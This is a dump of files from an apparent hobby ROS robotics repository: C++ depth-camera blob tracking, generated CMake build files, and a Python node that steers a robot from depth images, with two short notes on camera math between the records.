\n return 0;\n }\n else if (potentialBlob == NULL) {\n for (Blob<point2dDepth> b : blobs) {\n if (b.inBlob(neighbor)){\n potentialBlob = &b;\n break;\n }\n }\n }\n else {\n if (!potentialBlob->inBlob(neighbor)) {\n background->push_back(point);\n return 1;\n }\n }\n }\n potentialBlob->addPoint(point);\n return 2;\n} \n\nvoid printFrameWithBlobs(std::vector<Blob<point2dDepth>> blobs) {\n std::ofstream outFile;\n outFile.open(\"output.txt\");\n ROS_INFO(\"[Blob number: %d]\", blobs.size());\n for(int row = 0; row < HEIGHT; row++) {\n std::string oneRow;\n for(int col = 0; col < WIDTH; col++) {\n bool added = false;\n if(row >= HORIZON) {\n oneRow += \"0\";\n continue;\n }\n for(int k = 0; k < blobs.size(); k++) {\n if(blobs[k].inBlob(point2dDepth(col, row, 0))) {\n oneRow += boost::lexical_cast<std::string>(k + 1);\n added = true;\n break;\n }\n }\n if(!added) {\n oneRow += \"0\";\n }\n }\n //ROS_INFO(\"[%s]\", oneRow.c_str());\n outFile<<oneRow.c_str();\n outFile<<\"\\n\";\n }\n outFile.close();\n}\n\ninline int getXY(const depth_data& grid, int x, int y) {\n if( x > 0 && x < WIDTH && y > 0 && y < HEIGHT) {\n return grid.mm[x + (y * WIDTH)];\n }\n return 0;\n}\n\n\ninline point2dDepth getXY(const depth_data& grid, point2d p) {\n if( p.x > 0 && p.x < WIDTH && p.y > 0 && p.y < HEIGHT && getXY(grid, p.x, p.y) > 0) {\n return point2dDepth(p.x, p.y, getXY(grid, p.x, p.y)/1000.0); // + (rand() % 100)/ 100000.0); // add random distribution to points to try to avoid strict equality during smoothing\n }\n return point2dDepth(p.x, p.y, 0.0);\n}\n\nvoid set_camera_info(sensor_msgs::CameraInfo c){\n camera = c;\n}\n\nstd::array<float, 3> conv_to_3d(const depth_data& grid, int x, int y, const double* intr){\n //using default values found online \n float cx = 319.5;// intr[2];\n float cy = 239.5;// intr[5];\n float fx_inv = 1.0 / 525.0;// intr[0];\n float fy_inv = 1.0 / 525.0;// intr[4];\n\n float zO = getXY(grid, x, y) * .001; // z\n float xO = (zO * ((x - cx) * fx_inv)) + X_SHIFT; //x\n float yO = zO * ((y - cy) * fy_inv); //y\n\n return std::array<float, 3> { {xO, yO, zO} };\n}\n\nstd::array<int, 2> conv_to_2d(const std::array<float, 3> in, const double* intr){\n //using default values found online \n float cx = 319.5;// intr[2];\n float cy = 239.5;// intr[5];\n float fx = 525.0;// intr[0];\n float fy = 525.0;// intr[4]; \n\n return std::array<int, 2> { \n {(((in[0] - X_SHIFT) * fx) / in[2]) + cx,\n ((in[1] * fy) / in[2]) + cy}\n };\n}\n\nstd::array<float, 3> rotate_point_around_robot(const std::array<float, 3> in, float angle) {\n float x = in[0];// height doesn't change with turning\n float z = in[2];\n\n angle = angle*M_PI/180; // Convert to radians\n \n float pivX = 0; //point around center of robot\n float pivZ = -.06;\n\n x -= pivX;\n z -= pivZ;\n\n x = x*cos(angle) - z*sin(angle);\n z = z*cos(angle) + x*sin(angle);\n\n x += pivX;\n z += pivZ;\n\n return std::array<float, 3> { {x, in[1], z} }; //care for pointer problems\n}\n\nvoid change_velocity(const std::array<float, 3> new_transformed) {\n double time_passed = (btt::microsec_clock::universal_time() - last_time).total_milliseconds() / 1000.0; //In Seconds \n float angle_turned = DEGREES_PER_SECOND * time_passed;\n if (last_dir.direction == \"ccw\") {\n angle_turned *= -1.0; // is this right for undoing the turning? 
- since cw is in the negative direction, flip \n }\n else if (last_dir.direction == \"fwd\") {\n angle_turned = 0;\n }\n\n std::array<float, 3> temp = rotate_point_around_robot(new_transformed, angle_turned); // undo expected rotation\n\n if (last_blob.inBlob(point2dDepth(conv_to_2d(temp, camera.K.data())[0], conv_to_2d(temp, camera.K.data())[1], 0))) {\n velocity[0] = 0;\n velocity[1] = 0;\n velocity[2] = 0;\n }\n else {\n velocity[0] = (temp[0] - last_untransformed[0]) / time_passed;\n velocity[1] = (temp[1] - last_untransformed[1]) / time_passed;\n velocity[2] = (temp[2] - last_untransformed[2]) / time_passed;\n }\n ROS_INFO(\"Temp[0]: %f\", temp[0]);\n ROS_INFO(\"last_untransf[0]: %f\", last_untransformed[0]);\n ROS_INFO(\"Time passed: %f\", time_passed);\n ROS_INFO(\"New Vel (x,y,z): [%f, %f, %f]\", velocity[0], velocity[1], velocity[2]);\n}\n\nstd::array<float, 3> predict_new_center() {\n double time_passed = (btt::microsec_clock::universal_time() - last_time).total_milliseconds() / 1000.0; //In Seconds \n std::array<float, 3> new_center { {0.0, 0.0, 0.0} };\n new_center[0] = last_untransformed[0] + (velocity[0] * time_passed); //apply predicted movement \n //of target\n new_center[1] = last_untransformed[1] + (velocity[1] * time_passed);\n new_center[2] = last_untransformed[2] + (velocity[2] * time_passed); \n\n float angle_turned = DEGREES_PER_SECOND * time_passed;\n \n if (last_dir.direction.data() == \"cw\") {\n angle_turned *= -1.0;\n }\n\n return rotate_point_around_robot(new_center, angle_turned); // apply predicted movement of robot\n}\n\nvoid print_closest_point_pixel_coords(const depth_data& grid) {\n int out_x, out_y;\n int farthest = INT_MAX; \n for(int x = 0; x < WIDTH; x++){\n for(int y = 0; y < HEIGHT; y++){\n if ((getXY(grid, x, y) < farthest) && (getXY(grid, x, y) != 0)){\n out_x = x;\n out_y = y;\n farthest = getXY(grid, x, y);\n }\n }\n }\n ROS_INFO(\"I heard: [%d, %d]\", out_x, out_y);\n}\n\nvoid print_type_shortcuts() {\n PRINT_NAME(char);\n PRINT_NAME(signed char);\n PRINT_NAME(unsigned char);\n PRINT_NAME(short);\n PRINT_NAME(unsigned short);\n PRINT_NAME(int);\n PRINT_NAME(unsigned int);\n PRINT_NAME(long);\n PRINT_NAME(unsigned long);\n PRINT_NAME(float);\n PRINT_NAME(double);\n PRINT_NAME(long double);\n PRINT_NAME(char*);\n PRINT_NAME(const char*);\n}\n\n//Ros Functions\n\nvoid callback(sensor_msgs::Image frame) { \n depth_data grid;\n memcpy(&grid, frame.data.data(), sizeof(depth_data));\n d = grid;\n Blob<point2dDepth> b;// = Blob(grid); \n \n std::array<int, 2> center = b.getCenter();\n std::array<float, 3> real_coords = conv_to_3d(grid, center[0], center[1], camera.K.data()); //may need to convert camera data\n \n /*\n ROS_INFO(\"Center At: [%d, %d]\", center[0], center[1]); //For Debugging\n ROS_INFO(\"Area: [%d]\", b.getArea());\n ROS_INFO(\"Real World Last (x,y,z): [%f, %f, %f]\", last_untransformed[0], last_untransformed[1], last_untransformed[2]);\n ROS_INFO(\"Real World Real (x,y,z): [%f, %f, %f]\", real_coords[0], real_coords[1], real_coords[2]);*/\n\n if (received_first) { // make sure we have real starting point to compare against \n change_velocity(real_coords);\n }\n \n last_untransformed[0] = real_coords[0];\n last_untransformed[1] = real_coords[1];\n last_untransformed[2] = real_coords[2]; \n last_time = btt::microsec_clock::universal_time();\n //last_blob = b;\n\n if (!received_first) {\n received_first = true; \n }\n else if (!received_2) {\n received_2 = true;\n }\n}\n\n/*\nint main(int argc, char **argv)\n{\n\n ros::init(argc, argv, 
\"predictive_director\");\n\n ros::NodeHandle n;\n\n ros::Subscriber temp = n.subscribe(\"/openni2_camera/depth/camera_info\", 1000, set_camera_info);\n\n while(&camera == NULL) {//wait until we have camera information\n continue; \n }\n\n temp.~Subscriber();\n\n ros::Subscriber sub = n.subscribe(\"/openni2_camera/depth/image_raw\", 1000, callback);\n ros::Publisher dir_pub = n.advertise<basic_teleop::Move>(\"movement\", 1000);\n\n ros::Rate loop_rate(10); \n \n last_dir.direction = \"fwd\";\n\n while (ros::ok())\n {\n \n while(!received_2) { // wait until we have valid velocity data\n ros::spinOnce();\n\n loop_rate.sleep();\n } \n\n ROS_INFO(\"Last pub-ed: [%s]\", last_dir.direction.data()); \n\n std::array<float, 3> new_center = predict_new_center(); \n\n basic_teleop::Move next;\n\n std::array<int, 2> temp_2d = conv_to_2d(new_center, camera.K.data());\n\n if(temp_2d[0] >= 130 && temp_2d[0] <= 190) {\n next.direction = \"fwd\";\n }\n else if(temp_2d[0] < 130){ // to the right of the robot is lower values\n next.direction = \"cw\";\n }\n else {\n next.direction = \"ccw\";\n }\n \n dir_pub.publish(next);\n last_dir = next; \n \n ros::spinOnce();\n\n loop_rate.sleep();\n ++count;\n }\n \n return 0;\n}*/\n\nint main(int argc, char **argv)\n{ \n // ros::init(argc, argv, \"predictive_director\");\n ros::Time::init();\n //ros::NodeHandle n;\n\n //ros::Subscriber temp = n.subscribe(\"/openni2_camera/depth/camera_info\", 1000, set_camera_info);\n\n //while(&camera == NULL) {//wait until we have camera information\n // continue; \n //}\n\n //temp.~Subscriber();\n\n //ros::Subscriber sub = n.subscribe(\"/openni2_camera/depth/image_raw\", 1000, callback);\n //ros::Publisher dir_pub = n.advertise<basic_teleop::Move>(\"movement\", 1000);\n\n ros::Rate loop_rate(.1); \n \n last_dir.direction = \"fwd\";\n \n /*while(!received_2) { // wait until we have valid velocity data\n ros::spinOnce();\n\n loop_rate.sleep();\n }*/\n \n // Fake Image for debugging purposes\n d.mm[100] = 4500;\n d.mm[200] = 5400;\n d.mm[300] = 6300;\n d.mm[400] = 7200;\n d.mm[500] = 8100;\n d.mm[600] = 9000;\n d.mm[700] = 9900;\n d.mm[800] = 10800;\n d.mm[900] = 11700;\n loop_rate.sleep();\n printFrameWithBlobs(blobFrame(d)); \n\n};\n"
},
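A note on the camera model used by conv_to_3d / conv_to_2d above: both hard-code the common 640x480 OpenNI defaults (fx = fy = 525, cx = 319.5, cy = 239.5) even though the node works on 320x240 frames, so the intrinsics likely need to be halved, or read from camera.K, before the two projections agree with the sensor. Below is a minimal standalone sketch of the same pinhole round trip; the names (toCamera, toPixel) and the constants are my own illustration, not code from the repo:

    // Standalone sketch of the pinhole math in conv_to_3d / conv_to_2d above.
    #include <array>
    #include <cstdio>

    const float FX = 525.0f, FY = 525.0f;  // focal lengths in pixels (assumed defaults)
    const float CX = 319.5f, CY = 239.5f;  // principal point (assumed defaults)

    // Back-project pixel (u, v) with depth z (meters) into camera coordinates.
    std::array<float, 3> toCamera(int u, int v, float z) {
        return { { z * (u - CX) / FX, z * (v - CY) / FY, z } };
    }

    // Project a camera-space point back to pixel coordinates (rounded).
    std::array<int, 2> toPixel(const std::array<float, 3>& p) {
        return { { (int)(p[0] * FX / p[2] + CX + 0.5f),
                   (int)(p[1] * FY / p[2] + CY + 0.5f) } };
    }

    int main() {
        std::array<float, 3> p = toCamera(280, 100, 1.5f); // a point 1.5 m away
        std::array<int, 2> uv = toPixel(p);
        std::printf("3d: (%f, %f, %f) -> pixel: (%d, %d)\n",
                    p[0], p[1], p[2], uv[0], uv[1]);
        return 0; // round trip should recover pixel (280, 100)
    }

The round trip is the invariant worth testing: toPixel(toCamera(u, v, z)) should return (u, v) for any nonzero depth, which is a quick way to catch mis-scaled intrinsics.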
{
"alpha_fraction": 0.7833753228187561,
"alphanum_fraction": 0.7833753228187561,
"avg_line_length": 38.70000076293945,
"blob_id": "a62c39c6ac7a3632c39a7fba44b9a6a754205420",
"content_id": "adfd49004884677ee8ea5a37f2fb3cc52b93a104",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_generate_messages_eus\"\n \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop/msg/Move.l\"\n \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/basic_teleop_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7873303294181824,
"alphanum_fraction": 0.7873303294181824,
"avg_line_length": 26.625,
"blob_id": "c46effb2ed06702b3231d550f752fe48d2c753a0",
"content_id": "1befa59db4fa4453b4733ff27692a42566317e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 8,
"path": "/build/file_server/CMakeFiles/file_server_geneus.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/file_server_geneus\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/file_server_geneus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7700473070144653,
"alphanum_fraction": 0.7703031301498413,
"avg_line_length": 35.032257080078125,
"blob_id": "a743e3dc7a0cf153f42ac505179a54a1a0263f06",
"content_id": "4c31b66704372a162bcad5cb33321c85aca04c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 7819,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 217,
"path": "/build/basic_teleop/cmake/basic_teleop-genmsg.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"basic_teleop: 1 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Ibasic_teleop:/home/will/catkin_ws/src/basic_teleop/msg;-Istd_msgs:/opt/ros/jade/share/std_msgs/cmake/../msg;-Isensor_msgs:/opt/ros/jade/share/sensor_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/jade/share/geometry_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(basic_teleop_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_custom_target(_basic_teleop_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"basic_teleop\" \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" \"\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_cpp _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_gencpp)\nadd_dependencies(basic_teleop_gencpp basic_teleop_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_eus _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_geneus)\nadd_dependencies(basic_teleop_geneus basic_teleop_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n 
\"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_lisp _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_genlisp)\nadd_dependencies(basic_teleop_genlisp basic_teleop_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_lisp)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(basic_teleop\n \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(basic_teleop\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(basic_teleop_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(basic_teleop_generate_messages basic_teleop_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\" NAME_WE)\nadd_dependencies(basic_teleop_generate_messages_py _basic_teleop_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(basic_teleop_genpy)\nadd_dependencies(basic_teleop_genpy basic_teleop_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS basic_teleop_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/basic_teleop\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(basic_teleop_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET sensor_msgs_generate_messages_cpp)\n add_dependencies(basic_teleop_generate_messages_cpp sensor_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/basic_teleop\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(basic_teleop_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET sensor_msgs_generate_messages_eus)\n add_dependencies(basic_teleop_generate_messages_eus sensor_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/basic_teleop\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET 
std_msgs_generate_messages_lisp)\n add_dependencies(basic_teleop_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET sensor_msgs_generate_messages_lisp)\n add_dependencies(basic_teleop_generate_messages_lisp sensor_msgs_generate_messages_lisp)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/basic_teleop\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(basic_teleop_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET sensor_msgs_generate_messages_py)\n add_dependencies(basic_teleop_generate_messages_py sensor_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.602342426776886,
"alphanum_fraction": 0.6276259422302246,
"avg_line_length": 27.162303924560547,
"blob_id": "a76ea111e9206255b81e272846bb4ae91337ebb4",
"content_id": "20e847479a4bad55ba2282beb5afb6e7b4a10c26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5379,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 191,
"path": "/src/basic_teleop/scripts/reader.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n#ssh [email protected] - robo\n#ssh [email protected] - becker1a\n\nimport rospy\nimport time\nimport numpy\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import *\nfrom basic_teleop.msg import *\n\nclass BBox(object):\n \n def __init__(self, topX, topY, botX, botY):\n\tself.topX = topX\n\tself.topY = topY\n\tself.botX = botX\n\tself.botY = botY\n\n def __str__(self):\n\treturn \"Top corner is {0}, {1}.\\n Bottom corner is {2}, {3}.\\n center is {4}.\".format(self.topX, self.topY, self.botX, self.botY, self.getCenter())\n\n def getCenter(self):\n\treturn [(self.botX + (self.botX - self.topX)//2), (self.botY + (self.botY - self.topY)//2)]\n\n def getArea(self):\n\treturn (self.botX - self.topX) * (self.botY - self.topY)\n\nclass DepthGrid(object):\n\n def __init__(self, data, width, height):\n\tnormalized = numpy.fromstring(data, numpy.uint16)\n #grid = []\n\tgrid = {} \t\n\tcurheight = 0\n \tcurwidth = 0\n \trawPos = 0\n \twhile (curheight < height):\n\t #row = []\n\t while (curwidth < width):\n #row.append(normalized[rawPos])\n\t\tgrid[(curwidth, curheight)] = normalized[rawPos]\n \trawPos += 1\n \tcurwidth += 1\n\t #grid.append(row)\n\t curheight += 1\n\t curwidth = 0\n \tself.depths = grid\n\tself.width = width\n\tself.height = height\n\n def refresh(self, data):\n\tnormalized = numpy.fromstring(data, numpy.uint16)\n\tcurheight = 0\n\tcurwidth = 0\n\trawPos = 0\n\twhile (curheight < self.height): \n\t while (curwidth < curwidth):\n\t\tself.depths[(curwidth, curheight)] = normalized[rawPos]\n\t\trawPos += 1\n\t\tcurwidth += 1\n\t curheight += 1\n curwidth = 0\n\n def getXY(self, x, y):\n\treturn self.depths[(x, y)]#self.depths[y][x]\n\nclass DepthArray(object):\n\n def __init__(self, data, width, height):\n\tself.depths = numpy.fromstring(data, numpy.uint16)\n\tself.width = width\n\tself.height = height\n\n def getXY(self, x, y):\n\treturn self.depths[(y * self.width) + x]\n\nhistoryOfCenter=[]\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id())\n #print data.height\n #print data.width\n #print len(data.data)\n #print data.encoding\n #print data.step\n\n frame = DepthArray(data.data, data.width, data.height)\n\n directTowardsSuitableBlob(frame)\n\ndef directTowardsClosestPoint(grid):\n least = 99999999\n unacceptablyClose = 0\n leastX = 0\n leastY = 0\n for x in range (0, len(grid[0])):\n\tfor y in range (0, len(grid)):\n if ((grid.getXY(x, y) <= least) and (grid.getXY(x, y) !=0)):\n\t\tleast = grid.getXY(x, y)\n\t\tleastX = x\n\t\tleastY = y\n if (leastX <= 120):\n\tprint \"left\"\n pub.publish(Move(\"ccw\", 1))\n elif (leastX >= 200):\n\tprint \"right\"\n\tpub.publish(Move(\"cw\", 1))\n else:\n\tprint \"stop\"\n\tpub.publish(Move(\"fwd\", 1))\n\ndef findSimpleBBoxIncluding(grid, x, y):\n standard = grid.getXY(x, y)\n topX= x\n bottomX = x\n topY = y\n bottomY = y\n while ((grid.getXY(bottomX, bottomY) < (standard + 10)) and (grid.getXY(bottomX, bottomY) > (standard - 10)) and (bottomX < grid.width - 1)):\n\tstandard = grid.getXY(bottomX, bottomY)\n\tbottomX += 1\n while ((grid.getXY(bottomX, bottomY) < (standard + 10)) and (grid.getXY(bottomX, bottomY) > (standard - 10)) and (bottomY < grid.height - 1)):\n\tstandard = grid.getXY(bottomX, bottomY)\n\tbottomY += 1\n \n standard = grid.getXY(x, y)\n\n while ((grid.getXY(topX, topY) < (standard + 10)) and (grid.getXY(topX, topY) > (standard - 10)) and (topX > 0)):\n\tstandard = grid.getXY(topX, topY)\n\ttopX -= 1\n while ((grid.getXY(topX, topY) < (standard + 10)) and (grid.getXY(topX, 
topY) > (standard - 10)) and (topY > 0)):\n\tstandard = grid.getXY(topX, topY)\n\ttopY -= 1\n return BBox(topX, topY, bottomX, bottomY)\n\ndef findSuitableBBox(grid):\n output = BBox(0, 0, 0, 0)\n most = 0\n least = 99999999\n leastX = 0\n leastY = 0\n attemptCount = 0\n while(output.getArea() < 50):\n for x in range (0, grid.width):\n\t for y in range (0, grid.height):\n if ((grid.getXY(x, y) <= least) and (grid.getXY(x, y) > most)):\n\t\t least = grid.getXY(x, y)\n\t\t leastX = x\n\t\t leastY = y\n most = least\n\toutput = findSimpleBBoxIncluding(grid, leastX, leastY)\n\tleast = 99999999\n\tattemptCount += 1\n if (attemptCount > 4):\n\t break\t\n return output\n\ndef directTowardsSuitableBlob(grid):\n blob = findSuitableBBox(grid)\n blobCenter = blob.getCenter()\n if (blobCenter[0] <= 140):\n\tprint \"Blob found to the left\"\n pub.publish(Move(\"ccw\", 1))\n elif (blobCenter[0] >= 180):\n\tprint \"Blob found to the right\"\n\tpub.publish(Move(\"cw\", 1))\n else:\n\tprint \"Blob found in center; stop\"\n\tpub.publish(Move(\"fwd\", 1))\n\n\ndef listener():\n # In ROS, nodes are uniquely named. If two nodes with the same\n # node are launched, the previous one is kicked off. The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('driver', anonymous=True)\n #rospy.Subscriber(\"movement\", Move, callback)\n print \"ready to listen + learn!\"\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n print historyOfCenter\n\nsub = rospy.Subscriber(\"/openni2_camera/depth/image_raw_drop\", sensor_msgs.msg.Image, callback)\npub = rospy.Publisher('movement', Move, queue_size=10)\n\nif __name__ == '__main__':\n listener()\n"
},
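One detail worth calling out in reader.py above: the center of a bounding box with corners (topX, topY) and (botX, botY) is the midpoint of the corners, topX + (botX - topX)//2, not botX plus half the width as an earlier revision computed. A small self-contained C++ mirror of the BBox math, my own sketch rather than code from the repo:

    // Minimal mirror of reader.py's BBox; the center is the corner midpoint.
    #include <array>
    #include <cassert>

    struct BBox {
        int topX, topY, botX, botY;
        std::array<int, 2> center() const {
            return { { topX + (botX - topX) / 2, topY + (botY - topY) / 2 } };
        }
        int area() const { return (botX - topX) * (botY - topY); }
    };

    int main() {
        BBox b { 100, 40, 180, 120 }; // 80x80 box
        assert(b.center()[0] == 140 && b.center()[1] == 80); // midpoints of the corners
        assert(b.area() == 80 * 80);
        return 0;
    }

With the old formula the "center" of this box would have been x = 220, outside the box entirely, which would bias every steering decision made from it.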
{
"alpha_fraction": 0.5568862557411194,
"alphanum_fraction": 0.5678642988204956,
"avg_line_length": 25.36842155456543,
"blob_id": "e2ee74642f9cae97af15d023b63afe3232f08b7d",
"content_id": "7e285d3a562abab682517edf2ed62d505a107742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 38,
"path": "/src/basic_teleop/scripts/keyop.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
